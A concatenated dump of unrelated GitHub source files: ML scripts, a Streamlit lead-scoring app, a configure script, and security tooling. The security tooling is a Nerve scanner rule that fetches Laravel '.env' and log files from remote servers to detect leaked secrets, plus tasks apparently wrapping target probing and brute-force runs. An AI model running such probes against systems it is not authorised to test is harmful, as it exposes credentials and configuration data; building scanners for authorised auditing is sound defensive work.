warnings\nwarnings.filterwarnings(action='ignore')\n\n\n\n# A decorator is needed here so the app can manage this task (function)\n@app.task\ndef save_results(request):\n\tprint(request)\n\tresults = request.split(\"\\n\")\n\tfor sresults in results:\n\t\tsresult = sresults.split(\",\")\n\t\tif len(sresult) >= 5:\n\t\t\t# 'with' closes the file even if the write fails (the old try/finally raised NameError when open() itself failed)\n\t\t\twith open('alive.csv', 'a') as f:\n\t\t\t\tf.write(sresults + '\\n')\n\t\telif len(sresult) > 2:\n\t\t\twith open('brute.csv', 'a') as f1:\n\t\t\t\tf1.write(sresults + '\\n')\n\treturn True\n\n\n@app.task(time_limit=10000)\ndef send_request(target):\n\ttarget0 = target.split(\"\\n\")\n\tresults = ''\n\tfor t0 in target0:\n\t\tcmd = [\"/root/xhunter-WebAlive/xalive/w.sh\",t0]\n\t\tprint(cmd)\n\t\ttry:\n\t\t\toutput = subprocess.check_output(cmd)\n\t\texcept Exception:  # not a bare except: lets KeyboardInterrupt/SystemExit propagate\n\t\t\treturn None\n\t\twith open(RS_PATH + '/results/alive_results.csv') as file:\n\t\t\tnext(file)\n\t\t\tfor line in file:\n\t\t\t\tresults += line\n\t\twith open(RS_PATH + '/results/brute_results.csv') as f:\n\t\t\tnext(f)\n\t\t\tfor line1 in f:\n\t\t\t\tresults += line1\n\treturn results","repo_name":"moonlight-junky/xhunter-WebAlive","sub_path":"xalive/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"}
+{"seq_id":"29109671557","text":"import sys\nimport subprocess\nimport os\nimport logging\nfrom collections import defaultdict\nfrom argparse import ArgumentParser\n\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport yt.wrapper as yt\n\nsys.path.append('./proto')\nfrom realty.prediction.price_prediction_pb2 import PricePredictionResponse, PricePredictionLandingRequest\nfrom realty.offer import common_pb2, RealtySchema_pb2\nfrom realty import model_pb2\nfrom realty.offer.unified_offer_parts import address_part_pb2\nfrom google.protobuf.message import DecodeError\n\nyt.config[\"proxy\"][\"url\"] = \"hahn\"\n\nLOCALHOST = 'localhost:8895'\n\nlogging.basicConfig(\n    format=u'[# %(levelname)-8s [%(asctime)s] %(message)s',\n    level=logging.INFO\n)\n\n\ndef make_landing_message(row):\n    message = PricePredictionLandingRequest()\n\n    message.apartment.apartment_area = row[\"area\"]\n    message.apartment.rooms_total = row[\"rooms_offered\"]\n    # message.apartment.highrise_apartment_info.floors.append(data_nirvana[\"floor\"])\n    message.apartment.general_apartment_info.ceiling_height.value = row['ceiling_height']\n    message.apartment.building_info.built_year.value = row['build_year']\n    message.apartment.building_info.flats_count.value = row['flats_count']\n    message.apartment.building_info.expect_demolition.value = bool(row['expect_demolition'])\n    message.apartment.building_info.has_lift.value = bool(row['has_elevator'])\n    message.apartment.building_info.building_id.value = int(row['building_id'])\n    message.apartment.building_info.building_series.id = row['building_series_id']\n    message.apartment.building_info.building_type = row['building_type']\n    message.apartment.building_info.floors_total.value = row['floors_total']\n\n    message.location.geocoder_coordinates.latitude = row['lat']\n    message.location.geocoder_coordinates.longitude = row['lon']\n\n    c = address_part_pb2.Address.Component()\n    c.region_type = model_pb2.RegionType.Value('CITY')\n    c.value = row['locality_name']\n    message.location.geocoder_address.component.append(c)\n    message.location.geocoder_address.unified_oneline = row[\"unified_address\"]\n\n    message.location.subject_federation_geoid = 
row[\"subject_federation_id\"]\n return message\n\n\ndef create_protobuf(row, protobuf_model=\"offer\"):\n request = RealtySchema_pb2.OfferMessage()\n request.ParseFromString(row[b'offer'])\n if protobuf_model == \"offer\":\n return request\n elif protobuf_model == \"landing\":\n data = {\n \"area\": request.transaction.area.value,\n \"rooms_offered\": request.apartmentInfo.roomsOffered,\n 'ceiling_height': request.apartmentInfo.ceilingHeight,\n 'build_year': request.buildingInfo.buildYear,\n 'flats_count': request.buildingInfo.flatsCount,\n 'expect_demolition': request.buildingInfo.expectDemolition,\n 'has_elevator': request.buildingInfo.new_model.has_lift.value or None,\n 'building_id': request.buildingInfo.buildingId,\n 'building_series_id': request.buildingInfo.buildingSeriesId,\n # 'building_type': request.buildingInfo.buildingTypeInt,\n 'building_type': request.buildingInfo.buildingTypeInt,\n 'floors_total': request.buildingInfo.new_model.building_type,\n 'lat': request.location.geocoderPoint.latitude,\n 'lon': request.location.geocoderPoint.longitude,\n 'locality_name': request.location.localityName,\n \"unified_address\": request.location.geocoderAddress,\n \"subject_federation_id\": request.location.subjectFederationId,\n }\n request = make_landing_message(data)\n else:\n raise ValueError(\"protobuf_model must be 'offer' or 'landing'\")\n return request\n\n\ndef write_request_proto_to_file(request, output_file='proto.request.example.binary'):\n global result\n result = request.SerializeToString()\n with open(output_file, 'w+b') as file:\n file.write(result)\n\n\ndef one_request_api(price_pred_request,\n request_filepath='proto.request.rent.example.binary',\n response_filepath='proto.response.rent.example.binary',\n hostname=LOCALHOST,\n path='get_price_offer',\n quantile_type=None) -> PricePredictionResponse:\n write_request_proto_to_file(price_pred_request, output_file=request_filepath)\n model_type = \"\"\n if quantile_type is not None:\n model_type = f\"?model_type={quantile_type}\"\n curl_call_string = f'curl -s --header \"Content-Type: application/protobuf\" --request POST --data-binary @{request_filepath} http://{hostname}/api/v2/{path}{model_type} > {response_filepath}'\n\n subprocess.check_call(curl_call_string, shell=True)\n\n price_resp = PricePredictionResponse()\n with open(response_filepath, 'r+b') as read_file:\n binary_string = read_file.read()\n price_resp.ParseFromString(binary_string)\n\n os.remove(request_filepath)\n return price_resp\n\n\ndef process_yt_offers(table_path, hostname, path, protobuf_model, data_path=None):\n logging.info(\"Start quality estimation\")\n logging.info(f\"table_path: {table_path}\")\n logging.info(f\"hostname: {hostname}\")\n logging.info(f\"path: {path}\")\n logging.info(f\"protobuf_model: {protobuf_model}\")\n iter_table = yt.read_table(\n table_path,\n format=yt.YsonFormat(encoding=None)\n )\n\n results = []\n for row in tqdm(iter_table):\n request = create_protobuf(row, protobuf_model)\n try:\n price_resp_plain = one_request_api(request,\n request_filepath='proto.request.sell.msc.example.binary',\n response_filepath='proto.response.sell.msc.example.binary',\n hostname=hostname,\n path=path)\n except DecodeError as e:\n logging.info(e)\n\n results.append({\n \"coarse_subject_id\": row[b'coarse_subject_id'],\n \"subject_id\": row[b'subject_id'],\n \"price\": row[b'price'],\n \"old_predicted_price\": row[b'predicted_price'],\n \"new_predicted_price\": price_resp_plain.predicted_price.value,\n \"new_predicted_q05\": 
price_resp_plain.predicted_price.q05,\n \"new_predicted_q25\": price_resp_plain.predicted_price.q25,\n \"new_predicted_q75\": price_resp_plain.predicted_price.q75,\n \"new_predicted_q95\": price_resp_plain.predicted_price.q95,\n })\n\n df_result = pd.DataFrame(results)\n df_result[\"old_mape\"] = np.abs(df_result[\"old_predicted_price\"] - df_result[\"price\"]) / df_result[\"price\"]\n df_result[\"new_mape\"] = np.abs(df_result[\"new_predicted_price\"] - df_result[\"price\"]) / df_result[\"price\"]\n df_result[\"q25_q75_weight\"] = ((df_result[\"price\"] > df_result[\"new_predicted_q25\"]) & \\\n (df_result[\"price\"] < df_result[\"new_predicted_q75\"])).astype(\"double\")\n df_result[\"q05_q95_weight\"] = ((df_result[\"price\"] > df_result[\"new_predicted_q05\"]) & \\\n (df_result[\"price\"] < df_result[\"new_predicted_q95\"])).astype(\"double\")\n\n result = df_result.groupby(\"coarse_subject_id\")[[\"old_mape\", \"new_mape\", \"q25_q75_weight\", \"q05_q95_weight\"]].mean()\n print(result)\n if data_path is not None:\n df_result.to_csv(data_path)\n\n\ndef read_args():\n parser = ArgumentParser()\n parser.add_argument(\"--path\", default=\"get_price_offer\")\n parser.add_argument(\"--hostname\", default=LOCALHOST)\n parser.add_argument(\"--table_path\")\n parser.add_argument(\"--data_path\", nargs='?')\n parser.add_argument(\"--protobuf_model\", default=\"offer\")\n args = parser.parse_args()\n return args\n\n\nif __name__ == \"__main__\":\n args = read_args()\n process_yt_offers(\n table_path=args.table_path,\n hostname=args.hostname,\n path=args.path,\n protobuf_model=args.protobuf_model,\n data_path=args.data_path\n )\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"classfields/test/quality_today_test.py","file_name":"quality_today_test.py","file_ext":"py","file_size_in_byte":8079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40286277319","text":"'''\nHow to program in Python - Chapter 13\nReading and priting a file.\n'''\n\nimport sys\n\ndef main():\n '''Main Function'''\n # open a file\n try:\n file = open('clients.dat', 'r')\n except IOError:\n print(\"file could not been opened\", file=sys.stderr)\n\n records = file.readlines()\n print(\"Account\".ljust(10), \"Name\".ljust(10), \"Balance\".rjust(10))\n\n for record in records:\n fields = record.split()\n print(fields[0].ljust(10), fields[1].ljust(10), fields[2].rjust(10))\n\n file.close()\n\n\nmain()\n","repo_name":"wesinalves/100daysofcodev2","sub_path":"codigos/cap13/reading_file.py","file_name":"reading_file.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"31842178934","text":"import os\nimport argparse\n\nimport numpy as np\nimport PIL.Image as Image\n\n\nparser = argparse.ArgumentParser(\n description='Transfer TrainId To LabelId For Cityscapes')\nparser.add_argument('--pred-dir', type=str, default='',\n help='/path/to/segment/predictions.')\nparser.add_argument('--save-dir', type=str, default='',\n help='/path/to/saved/results.')\nargs = parser.parse_args()\n\nTRANSFORM_TB = [\n 7, 8, 11, 12, 13, 17, 19, 20, 21, 22,\n 23, 24, 25, 26, 27, 28, 31, 32, 33\n]\n\nif not os.path.isdir(args.save_dir):\n os.makedirs(args.save_dir)\nfor dirpath, dirnames, filenames in os.walk(args.pred_dir):\n for filename in filenames:\n predname = os.path.join(dirpath, filename)\n pred = np.asarray(\n Image.open(predname).convert(mode='L'),\n dtype=np.uint8)\n \n 
new_predname = predname.replace(args.pred_dir,\n                                    args.save_dir)\n    if not os.path.isdir(os.path.dirname(new_predname)):\n      os.makedirs(os.path.dirname(new_predname))\n\n    new_pred = np.zeros_like(pred)\n    for train_id, label_id in enumerate(TRANSFORM_TB):\n      new_pred[pred == train_id] = label_id\n\n    Image.fromarray(new_pred, mode='L').save(new_predname)\n","repo_name":"twke18/Adaptive_Affinity_Fields","sub_path":"pyscripts/benchmark/encode_cityscapes_testid.py","file_name":"encode_cityscapes_testid.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":260,"dataset":"github-code","pt":"3"}
+{"seq_id":"3378395857","text":"import streamlit as st\r\nimport pandas as pd\r\nimport pickle\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\r\nfrom sklearn.compose import ColumnTransformer\r\nimport numpy as np\r\n\r\nst.title('Lead Scoring')\r\n### gif from url\r\nst.markdown(\"![Alt Text](https://thumbs.gfycat.com/FastMiserlyJellyfish.webp)\")\r\n\r\nst.header('The problem')\r\nst.write(\"\"\"An organization that offers a hiring assessment platform\r\n is looking to reduce its annual marketing spending\"\"\")\r\nst.header('Approach')\r\nst.write(\"\"\"Build a sophisticated **Machine Learning model that predicts \r\nthe percentage probability** of marketing leads purchasing their product. This allows the company to be more precise with their marketing by targeting high-probability customers. \"\"\")\r\nst.write(\"**Notes**:\")\r\nst.write(\"\"\"\\n 1. The data is from a Kaggle machine learning competition and anyone can download it: https://www.kaggle.com/parv619/hackerearths-reduce-marketing-waste\r\n\\n 2. This company has already aggregated a lot of data to reach this point; that's why a success probability is already available. If your company has similar data \r\nwe are able to create a similar metric based on your dataset before employing the machine learning algorithm.\"\"\")\r\nst.header('Sample of the data')\r\n\r\n# reading in the data\r\n\r\ndef data_reader(path_full,path_clean):\r\n    df = pd.read_csv(path_full)\r\n    clean_df = pd.read_csv(path_clean,index_col=0)\r\n    return df, clean_df\r\ndf, clean_df = data_reader('train.csv','cleaned_data.csv')\r\n\r\nst.dataframe(df.head(5))\r\n\r\nst.write(\"\"\" This is a snapshot of the clients in the dataset. The goal is to predict the Success probability. This was provided in the dataset, and the aim is to be able to accurately\r\n predict this percentage\"\"\")\r\n\r\nst.header(\"Machine learning\")\r\nst.write(\"\"\"After extensive data cleaning and exploratory data analysis, the columns we included in our model were: \r\n **deal value, product pitched, lead revenue, fund category, country, state, hiring candidate role, lead source, internal point of contact, date of creation** \"\"\")\r\n\r\n\r\nfilename = 'grad_boost.sav'\r\nloaded_model = pickle.load(open(filename, 'rb'))\r\n\r\n\r\nst.header('What features were most important for our model?')\r\nfeature_importance = pd.read_csv('feature_importance.csv',index_col=0)\r\n\r\n\r\nplot_imp = feature_importance.sort_values(by = 'Feature Importance',ascending=False).head(10)\r\nfig, ax = plt.subplots()\r\nsns.barplot(data = plot_imp, x ='Feature Importance', y = plot_imp.index )\r\nax.set_yticklabels(['India','USA','Internal Rating','Level 3 Meeting','Fund Category 1','Lead Source: Contact Email','Meeting level 1','Deal Value','Lead revenue 500Mil to 1 Bil','Lead Source Email'])\r\nst.pyplot(fig)\r\n\r\nst.write(\"\"\"Feature importance simply shows the extent to which the model used each feature. These features are very specific to this business, so yours will look different. This information could be useful\r\n to a business when deciding how to act on the information from the model. \"\"\")\r\n\r\n\r\n\r\nst.header('Random Prediction')\r\nst.write(\"This has randomly selected one of the customers; now let's see how well the model does\")\r\n\r\n\r\nunclean_df = df[df.index.isin(clean_df.index)]\r\n\r\nclean_df.reset_index(inplace=True,drop=True)\r\nunclean_df.reset_index(inplace=True,drop=True)\r\nchosen_one = unclean_df.sample(1)\r\n\r\nchosen_one_index = chosen_one.index\r\n\r\n\r\nst.dataframe(chosen_one)\r\nactual = chosen_one.Success_probability\r\n\r\n\r\nc1, c2, c3 = st.columns((1,1,1))\r\nwith c1:\r\n    st.write('The answer we hope to get:🤞',actual)\r\n\r\n\r\n\r\ncat_cols = ['Industry',\r\n'Pitch',\r\n'Lead_revenue',\r\n'Fund_category',\r\n'Location',\r\n'Geography',\r\n'Hiring_candidate_role',\r\n'Lead_source',\r\n'Level_of_meeting',\r\n'Internal_POC']\r\n\r\n\r\n\r\n# column transformer and pipeline\r\nct = ColumnTransformer(\r\n    [\r\n        (\"cat_transformer\", OneHotEncoder(sparse=False),cat_cols),\r\n        (\"num_transformer\", StandardScaler(),['Deal_value'])\r\n    ]\r\n    ,remainder = 'passthrough')\r\n\r\nall_prepped = ct.fit_transform(clean_df)\r\nchosen_prepped = all_prepped[chosen_one_index]\r\n\r\nprediction = loaded_model.predict(chosen_prepped)\r\nwith c2:\r\n    st.write('Prediction:',prediction)\r\nwith c3:\r\n    st.write('Error: ',abs(prediction - actual.values))\r\n    st.write('This should be quite small; on average our model only had an error of 0.22 on unseen data')\r\nst.write('**Refresh the page for a new customer**')\r\nst.header('What next?')\r\nst.write(\"\"\"In this case the model gives us a success probability. We would now use the model on \r\nnew clients where we have not already calculated the success probability; this should save the company money on marketing \r\nand also give them some more insights into their product.\r\n\"\"\")\r\n","repo_name":"andersonbolusherbst/leadscoring","sub_path":"streamlit.py","file_name":"streamlit.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"30426870405","text":"from core.redis import rds\nfrom core.triage import Triage\nfrom core.parser import ScanParser\n\nclass Rule:\n  def __init__(self):\n    self.rule = 'CFG_823E'\n    self.rule_severity = 3\n    self.rule_description = 'This rule checks for misconfigurations in Laravel'\n    self.rule_confirm = 'Remote Server Misconfigured Laravel'\n    self.rule_mitigation = '''Laravel has been misconfigured and may leak environment or log data. 
\\\nUse the Laravel Hardening Guidelines for reference: https://laravel.com/docs/7.x/configuration'''\n self.rule_details = ''\n self.rule_match_string = {\n '/storage/logs/laravel.log':{\n 'app':'LARAVEL_FRAMEWORK_LOG',\n 'match':['Stack trace', 'Did you mean one of these?', 'ConsoleOutput'],\n 'title':'Laravel Framework Log'\n },\n '/.env':{\n 'app':'LARAVEL_FRAMEWORK_ENV',\n 'match':['MIX_PUSHER_APP_KEY', 'BROADCAST_DRIVER'],\n 'title':'Laravel Framework Env File'\n },\n }\n self.intensity = 1\n \n \n\n def check_rule(self, ip, port, values, conf):\n t = Triage()\n p = ScanParser(port, values)\n \n module = p.get_module()\n domain = p.get_domain()\n \n if 'http' not in module:\n return\n \n for uri, values in self.rule_match_string.items():\n app_title = values['title']\n \n resp = t.http_request(ip, port, uri=uri)\n \n if resp is not None:\n for match in values['match']:\n if match in resp.text:\n self.rule_details = 'Laravel Misconfiguration - {} at {}'.format(app_title, resp.url)\n rds.store_vuln({\n 'ip':ip,\n 'port':port,\n 'domain':domain,\n 'rule_id':self.rule,\n 'rule_sev':self.rule_severity,\n 'rule_desc':self.rule_description,\n 'rule_confirm':self.rule_confirm,\n 'rule_details':self.rule_details,\n 'rule_mitigation':self.rule_mitigation\n })\n return","repo_name":"PaytmLabs/nerve","sub_path":"rules/configuration/rule_laravel.py","file_name":"rule_laravel.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":422,"dataset":"github-code","pt":"3"} +{"seq_id":"27342371066","text":"def factorial_recursion(n):\n if n == 1:\n return 1\n return n * factorial_recursion(n-1)\n \n\ndef factorial_iterative(n):\n answer = 1\n while n > 1:\n answer = answer*n \n n = n - 1\n return answer\n\n\n# print (factorial_iterative(5))\n# print (factorial_recursion(3))\n\n# 0 ,1 , 1, 2, 3, 5, 8, 13, 21\n\ndef fibonacci_recur(n):\n if n < 2:\n return n \n \n return fibonacci_recur(n-1) + fibonacci_recur(n-2)\n\ndef fibonacci_iter(n):\n if n == 1 or n == 2:\n return 1\n first = 0 \n second = 1\n i = 1\n result = 0\n while i < n:\n result = first+second\n first = second\n second = result\n i += 1\n return result\n\n# print(fibonacci_iter(1))\n# print(fibonacci_recur(1))\n\n\n\n\n \n\n\n\n","repo_name":"abhijaini/DataStructures-and-Algorithms","sub_path":"Algorithms/Recursion.py","file_name":"Recursion.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74195553680","text":"import numpy as np\nimport pandas as pd\n\n\ndef fmtest():\n print(\"test test\")\n\n\ndef outlierLowMembership(val, o15, o30):\n if val < o30:\n return 1\n membershipValue = (o15-val)/(o15-o30)\n return membershipValue\n\n\ndef outlierHighMembership(val, o15, o30):\n if val > o30:\n return 1\n membershipValue = (val-o15)/(o30-o15)\n return membershipValue\n\n\ndef outlierRegression(x, y):\n X = np.sort(x)\n q25 = np.quantile(X, 0.25)\n q75 = np.quantile(X, 0.75)\n IQD = q75-q25\n outlierLower15 = q25-1.5*IQD\n outlierHigher15 = q75+1.5*IQD\n outlierLower30 = q25-3*IQD\n outlierHigher30 = q75+3*IQD\n outliers = []\n for xo in x:\n if xo > outlierHigher15 or xo < outlierLower15:\n outliers.append(1)\n continue\n outliers.append(0)\n Y = np.sort(y)\n q25 = np.quantile(Y, 0.25)\n q75 = np.quantile(Y, 0.75)\n IQD = q75-q25\n outlierLower15 = q25-1.5*IQD\n outlierHigher15 = q75+1.5*IQD\n outlierLower30 = q25-3*IQD\n outlierHigher30 = q75+3*IQD\n for yi in range(len(y)):\n if y[yi] > 
outlierHigher15 or y[yi] < outlierLower15:\n outliers[yi] = 1\n return outliers\n\n\ndef findOutliersIn(dataArray):\n newObjects = []\n for valueArray in dataArray:\n valueArrayNew = list(map(lambda v: float(v), valueArray))\n valueArrayNew = np.array(valueArrayNew)\n valueArrayNew = np.sort(valueArrayNew)\n q25 = np.quantile(valueArrayNew, 0.25)\n q75 = np.quantile(valueArrayNew, 0.75)\n IQD = q75-q25\n outlierLower15 = q25-1.5*IQD\n outlierHigher15 = q75+1.5*IQD\n outlierLower30 = q25-3*IQD\n outlierHigher30 = q75+3*IQD\n objectSet = {}\n objectSet[\"ol15\"] = outlierLower15\n objectSet[\"oh15\"] = outlierHigher15\n objectSet[\"ol30\"] = outlierLower30\n objectSet[\"oh30\"] = outlierHigher30\n outlierArray = []\n membershipsArray = []\n for v in valueArray:\n on = outlierNumber(v, outlierLower15, outlierHigher15)\n outlierArray.append(on)\n if on == 1:\n membershipsArray.append(outlierLowMembership(\n float(v), float(outlierLower15), float(outlierLower30)))\n if on == 2:\n membershipsArray.append(outlierHighMembership(\n float(v), float(outlierHigher15), float(outlierHigher30)))\n if on == 0:\n membershipsArray.append(0)\n objectSet[\"outlierArray\"] = outlierArray\n objectSet[\"membershipsArray\"] = membershipsArray\n newObjects.append(objectSet)\n outlierArray = newObjects[0][\"outlierArray\"]\n membershipsArray = newObjects[0][\"membershipsArray\"]\n for a in newObjects:\n for oi in range(len(a[\"outlierArray\"])):\n if a[\"outlierArray\"][oi] != 0:\n outlierArray[oi] = a[\"outlierArray\"][oi]\n if a[\"membershipsArray\"][oi] != 0:\n membershipsArray[oi] = a[\"membershipsArray\"][oi]\n return {\n \"o\": outlierArray,\n \"m\": membershipsArray\n }\n\n\ndef outlierNumber(num, lb, hb):\n if float(num) > hb:\n return 2\n if float(num) < lb:\n return 1\n return 0\n\n\ndef outlierFuzzy(data):\n newObjects = []\n for objectSet in data:\n isNumber = True\n for o in objectSet[\"values\"]:\n if is_int(o[\"value\"]) == False and is_float(o[\"value\"]) == False:\n isNumber = False\n break\n if (isNumber):\n objectArray = list(\n map(lambda os: float(os[\"value\"]), objectSet[\"values\"]))\n objectArray = np.array(objectArray)\n objectArray = np.sort(objectArray)\n q25 = np.quantile(objectArray, 0.25)\n q75 = np.quantile(objectArray, 0.75)\n IQD = q75-q25\n outlierLower15 = q25-1.5*IQD\n outlierHigher15 = q75+1.5*IQD\n outlierLower30 = q25-3*IQD\n outlierHigher30 = q75+3*IQD\n objectSet[\"ol15\"] = outlierLower15\n objectSet[\"oh15\"] = outlierHigher15\n objectSet[\"ol30\"] = outlierLower30\n objectSet[\"oh30\"] = outlierHigher30\n for o in objectSet[\"values\"]:\n o[\"outlier\"] = outlierNumber(\n o[\"value\"], outlierLower15, outlierHigher15)\n newObjects.append(objectSet)\n return newObjects\n\n\ndef is_float(element: any) -> bool:\n if element is None:\n return False\n try:\n float(element)\n return True\n except ValueError:\n return False\n\n\ndef is_int(element: any) -> bool:\n if element is None:\n return False\n try:\n int(element)\n return True\n except ValueError:\n return False\n\n\ndef makeDynamic(data):\n newData = []\n names = []\n keyNames = []\n dateName = None\n fdict = {}\n for objectSet in data:\n if (objectSet[\"key\"]):\n keyNames.append(objectSet[\"title\"])\n else:\n if (objectSet[\"date\"]):\n dateName = objectSet[\"title\"]\n else:\n names.append(objectSet[\"title\"])\n v = list(map(lambda v: v[\"value\"], objectSet[\"values\"]))\n fdict[objectSet[\"title\"]] = v\n df = pd.DataFrame(fdict)\n uniqueNames = df[keyNames[0]].unique()\n dfNew = pd.DataFrame({})\n for name in 
uniqueNames:\n dfTemp = pd.DataFrame({})\n dfTemp = df[df[keyNames[0]] == name].reset_index(drop=True)\n dfTemp[dateName] = dfTemp[dateName].astype(float)\n minDate = dfTemp[dateName].min()\n minDateIndex = dfTemp[dfTemp[dateName] == minDate].index.item()\n for restName in names:\n dfTemp[restName] = (dfTemp[restName]).astype(float)\n dfTemp[restName] = dfTemp[restName] - \\\n float(dfTemp[restName][minDateIndex])\n dfNew = pd.concat([dfNew, dfTemp], ignore_index=True)\n for restName in names:\n dfNew[restName] = np.where(\n dfNew[restName] < 0, dfNew[restName]/abs(dfNew[restName].min()), dfNew[restName])\n dfNew[restName] = np.where(\n dfNew[restName] > 0, dfNew[restName]/dfNew[restName].max(), dfNew[restName])\n for dataset in data:\n newVals = dfNew[dataset[\"title\"]].values.tolist()\n newValuesFull = []\n for dpi in range(len(dataset[\"values\"])):\n val = dataset[\"values\"][dpi]\n val[\"value\"] = newVals[dpi]\n newValuesFull.append(val)\n dataset[\"values\"] = newValuesFull\n newData.append(dataset)\n return newData\n\n\n# async def correlations():\n# if request.method == 'POST':\n# content = request.json\n# dfData = {}\n# for nameIndex in range(len(content[\"fields\"])):\n# dfData[content[\"fields\"][nameIndex]] = list(\n# np.float_(content[\"data\"][nameIndex]))\n# pd.set_option('display.max_colwidth', 0)\n# df = pd.DataFrame(data=dfData)\n# return {\n# \"status\": \"ok\",\n# \"corr\": df.corr().to_numpy().tolist(),\n# \"headers\": {\"Access-Control-Allow-Origin\": \"*\"}\n# }\n# return {\n# \"status\": \"error\",\n# \"headers\": {\"Access-Control-Allow-Origin\": \"*\"}\n# }\n","repo_name":"circuspony/fuzzymapperserver","sub_path":"modules/fmanalysis.py","file_name":"fmanalysis.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17911457032","text":"import os,sys,glob,datetime,platform,time,re,stat,socket\nfrom subprocess import Popen,PIPE\nOs=platform.system()\nhost=socket.gethostname().lower()\nif host.startswith('raijin'):\n host='module use ~access/modules'\nelse:\n host=''\nglobal sleep\nsleep = 0.2\nif Os.lower() == 'darwin':\n Os='Osx'\n Path='/opt/local'\nelse:\n Os='Linux'\n Path='/usr'\n\ndef file_search(file):\n time.sleep(sleep)\n for path in os.environ['PATH'].split(':'):\n fn=os.path.join(path,file)\n if os.path.isfile(os.path.join(path,fn)):\n return True,fn\n return False,None\n\ndef checkenv(var,alt):\n try:\n return os.environ[var]\n except KeyError:\n return alt\n\n#netcdfmod=os.popen('locate netcdf.mod 2> /dev/null').read().strip()\n\nFC=checkenv('FC','gfortran')\nCC=checkenv('CC','gcc')\nFFLAGS=checkenv('FFLAGS','-ffixed-line-length-0 -std=legacy -g -O3 -fimplicit-none -fsign-zero -fbounds-check -fno-automatic')\nCFLAGS=checkenv('CFLAGS','-O3')\nINCLUDE=checkenv('INCLUDE',os.path.join(Path,'include')).replace(':',',')\nLDFLAGS=checkenv('LD_LIBRARY_PATH',os.path.join(Path,'lib')).replace(':',',')\nFLIBS=checkenv('FLIBS','netcdff')\nCLIBS=checkenv('CLIBS','netcdf')\nBATCH=checkenv('BATCH',0)\nPROJECT=checkenv('PROJECT',None)\nMAIL=checkenv('EMAIL','')\nPREFIX=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n#if len(netcdfmod):\n# INCLUDE+=',%s'%os.path.dirname(netcdfmod)\ntry:\n ar=sys.argv[1:]\n help=False\n for b in ar:\n a=b.replace('--','').upper()\n if b.startswith('-h') or b.startswith('--h'):\n help=True\n if b.lower().startswith('--prefix'):\n PREFIX = a.lower().split('=')[1]\n if a.startswith('FC'):\n FC=a.split('=')[-1]\n if 
a.startswith('FFLAGS'):\n FCFLAGS=a.split('=')[-1].replace(',',' ')\n if a.startswith('CFLAGS'):\n CFLAGS=a.split('=')[-1].replace(',',' ')\n if a.startswith('INCLUDE'):\n INCLUDE=a.split('=')[-1]\n if a.startswith('LD_LIBRARY_PATH'):\n LDFLAGS=a.split('=')[-1]\n if a.startswith('CLIBS'):\n CLIBS=a.split('=')[-1]\n if a.startswith('FLIBS'):\n FLIBS=a.split('=')[-1]\n if a.startswith('BATCH'):\n batch=a.split('=')[-1].lower()\n try :\n BATCH={'p':'pbs','s':'slurm','ll':'ll'}[batch[0]]\n except KeyError:\n sys.stderr.write('Batch option should be one of the following: pbs, slurm\\n')\n sys.exit(257)\n if a.startswith('PROJECT'):\n PROJECT=a.split('=')[-1]\n if a.startswith('EMAIL'):\n MAIL=a.split('=')[-1]\n\nexcept IndexError:\n print(help)\n help=True\ntxt=\"\"\"\n%s configures variational analysis to adapt to many kinds of systems.\nUsage: %s [OPTION]... [VAR=VALUE]...\n\nTo assign environment variables (e.g., CC, CFLAGS...), specify them as\nVAR=VALUE. See below for descriptions of some of the useful variables.\n\nDefaults for the options are specified in brackets\n\nConfiguration:\n -h, --help display this help and exit\n\nInstallation directories:\n --prefix=PREFIX install architecture-independent files in PREFIX\n [default: %s]\n By default, 'make' will install all the files in\n %s etc. You can specify and installation prefix by using --prefix\n for instance --prefix=$HOME\n\nSome influential environment variables:\n FC Fortran compiler command\n [default gfortran]\n CC C compiler command\n [default gcc]\n FCFLAGS Fortran compiler flags\n [default -O3 -Wpedantic -fimplicit-none -fsign-zero]\n CFLAGS C compiler flags\n [default -O3 -Wpedantic]\n LD_LIBRAY_PATH linker flags, e.g. -L if you have libraries in a\n nonstandard directory \n [default %s]\n INCLUDE include flags e.g. -I in a\n the headers in a nonstandard directory \n [default %s]\n FLIBS fortran libraries to pass to the linker, e.g. -l\n [default netcdff]\n CLIBS c libraries to pass to the linker, e.g. -l\n [default netcdf,m]\n BATCH batch system to submit jobs to a computing cluster e.g. PBS\n [default None]\n PROJECT project that is used to charge cpu time when BATCH is set\n e.g. w42\n [default None]\n EMAIL email address of the user\n [default None]\n\n\n Use these variables to override the choices made by %s or to help\n it to find libraries and programs with nonstandard names/locations.\n\n Report bugs to .\n\n\"\"\" %(sys.argv[0],sys.argv[0],PREFIX,PREFIX,os.path.join(Path,'libs'),os.path.join(Path,'include'),sys.argv[0])\nif help:\n sys.exit(txt)\n\naltnames=dict(sed='sed',awk='awk',date='date')\n\nLDFLAGS=LDFLAGS.split(',')\n\n\nmissing_package=[]\n\ncheckbin=(\\\n ('gnu make','make',1),\n ('fortran compiler',FC,1),\n ('C compiler',CC,1),\n ('nc-config','nc-config',1),\n ('ncap','ncap',1),\n ('ncatted','ncatted',1),\n ('ncbo','ncbo',1),\n ('ncdiff','ncdiff',1),\n ('ncdump','ncdump',1),\n ('ncea','ncea',1),\n ('ncecat','ncecat',1),\n ('nces','nces',1),\n 